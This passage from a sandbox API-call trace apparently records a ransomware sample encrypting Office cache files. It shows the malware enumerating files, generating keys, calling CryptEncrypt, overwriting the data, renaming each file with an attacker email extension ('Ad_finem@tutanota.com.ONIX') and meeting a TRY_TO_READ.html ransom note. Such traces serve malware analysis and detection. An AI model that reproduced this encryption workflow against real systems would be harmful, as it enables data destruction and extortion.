0x2b30020 [0095.538] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.539] ReadFile (in: hFile=0x294, lpBuffer=0x2680020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xd4200, lpOverlapped=0x0) returned 1 [0095.578] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd4200, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.578] CloseHandle (hObject=0x294) returned 1 [0095.584] GetProcessHeap () returned 0x410000 [0095.584] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.584] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.586] GetProcessHeap () returned 0x410000 [0095.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0095.586] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0095.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.586] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.586] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.586] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.586] GetLastError () returned 0x0 [0095.586] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x294 [0095.586] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.586] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x32b, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.586] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.586] ReadFile (in: hFile=0x294, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.588] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.588] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.588] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.588] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.588] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", dwFileAttributes=0x80) returned 1 [0095.589] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 76 [0095.589] GetProcessHeap () returned 0x410000 [0095.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0095.589] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0095.589] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.589] GetFileSizeEx (in: hFile=0x294, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=811) returned 1 [0095.589] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x32b [0095.589] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.589] GetProcessHeap () returned 0x410000 [0095.589] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.589] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.589] WriteFile (in: hFile=0x294, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.591] WriteFile (in: hFile=0x294, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.592] WriteFile (in: hFile=0x294, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.593] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x32b) returned 0x46a0f0 [0095.593] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x32b) returned 0x4b6b68 [0095.593] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.593] ReadFile (in: hFile=0x294, lpBuffer=0x46a0f0, nNumberOfBytesToRead=0x32b, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesRead=0x367f44c*=0x32b, lpOverlapped=0x0) returned 1 [0095.593] SetFilePointer (in: hFile=0x294, lDistanceToMove=-811, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.593] WriteFile (in: hFile=0x294, lpBuffer=0x4b6b68*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesWritten=0x367f44c*=0x32b, lpOverlapped=0x0) returned 1 [0095.594] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a0f0 | out: hHeap=0x410000) returned 1 [0095.594] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0095.594] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x32b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.594] CloseHandle (hObject=0x294) returned 1 [0095.595] GetProcessHeap () returned 0x410000 [0095.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.595] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.598] GetProcessHeap () returned 0x410000 [0095.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0095.598] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0095.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.598] GetLastError () returned 0x0 [0095.598] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x294 [0095.598] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.599] LockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16fc, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.599] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.599] ReadFile (in: hFile=0x294, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.600] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.600] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.601] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.601] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.601] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0095.601] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0095.601] GetProcessHeap () returned 0x410000 [0095.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0095.601] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" [0095.601] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.601] GetFileSizeEx (in: hFile=0x294, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=5884) returned 1 [0095.601] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16fc [0095.601] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.601] GetProcessHeap () returned 0x410000 [0095.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.601] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.601] WriteFile (in: hFile=0x294, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.603] WriteFile (in: hFile=0x294, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.604] WriteFile (in: hFile=0x294, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16fc) returned 0x4b6b68 [0095.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16fc) returned 0x4b8270 [0095.605] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.605] ReadFile (in: hFile=0x294, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesRead=0x367f44c*=0x16fc, lpOverlapped=0x0) returned 1 [0095.606] SetFilePointer (in: hFile=0x294, lDistanceToMove=-5884, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.606] WriteFile (in: hFile=0x294, lpBuffer=0x4b8270*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b8270*, lpNumberOfBytesWritten=0x367f44c*=0x16fc, lpOverlapped=0x0) returned 1 [0095.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0095.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b8270 | out: hHeap=0x410000) returned 1 [0095.607] UnlockFile (hFile=0x294, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16fc, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.607] CloseHandle (hObject=0x294) returned 1 [0095.608] GetProcessHeap () returned 0x410000 [0095.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.608] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.610] GetProcessHeap () returned 0x410000 [0095.610] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.610] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.610] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.610] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0095.610] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bf60d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0095.610] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.610] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0095.611] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.611] GetLastError () returned 0x0 [0095.611] FindNextFileW (in: hFindFile=0x48ea30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bf60d0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0095.611] CloseHandle (hObject=0x3cc) returned 1 [0095.611] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.611] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x23, wMilliseconds=0x21)) [0095.611] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0095.611] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.611] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.612] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0095.612] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0095.612] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.612] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x449d98 [0095.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4585b0 | out: hHeap=0x410000) returned 1 [0095.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4f0 | out: hHeap=0x410000) returned 1 [0095.612] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ea70 [0095.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0095.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.612] GetLastError () returned 0x0 [0095.613] FindNextFileW (in: hFindFile=0x48ea70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0095.613] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0095.613] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.613] GetLastError () returned 0x0 [0095.613] FindNextFileW (in: hFindFile=0x48ea70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0095.613] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0095.613] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.613] GetLastError () returned 0x0 [0095.613] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x38c [0095.613] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.613] LockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd5600, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.613] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.613] ReadFile (in: hFile=0x38c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.615] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, 